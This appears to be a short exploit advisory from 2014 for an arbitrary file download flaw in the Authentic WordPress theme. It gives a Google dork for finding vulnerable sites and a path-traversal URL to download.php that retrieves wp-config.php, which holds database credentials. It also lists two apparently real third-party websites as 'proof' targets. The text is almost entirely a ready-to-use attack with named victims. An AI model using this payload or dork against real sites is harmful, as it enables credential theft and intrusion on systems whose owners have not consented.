|#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#|
|-------------------------------------------------------------------------|
|[*] Exploit Title: Wordpress Authentic Theme Arbitrary File Download  
Vulnerability
|
|[*] Google Dork: inurl:wp-content/themes/authentic
|
|[*] Date : Date: 2014-09-07
|
|[*] Exploit Author: Ashiyane Digital Security Team
|
|[*] Vendor Homepage : http://www.organizedthemes.com/authentic-theme
|
|[*] Tested on: Windows 7
|
|-------------------------------------------------------------------------|
|
|[*] Location :
[localhost]/wp-content/themes/authentic/includes/download.php?file=../../../../wp-config.php
|
|-------------------------------------------------------------------------|
|[*] Proof:
|
|[*]
ttp://www.newlifecenterwv.org/wp-content/themes/authentic/includes/download.php?file=../../../../wp-config.php
|
|[*]
http://www.pillarhoodriver.org/wp-content/themes/authentic/includes/download.php?file=../../../../wp-config.php
|
|
|-------------------------------------------------------------------------|
|[*] Discovered By : ACC3SS
|-------------------------------------------------------------------------|
|-------------------------------------------------------------------------|
|#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#|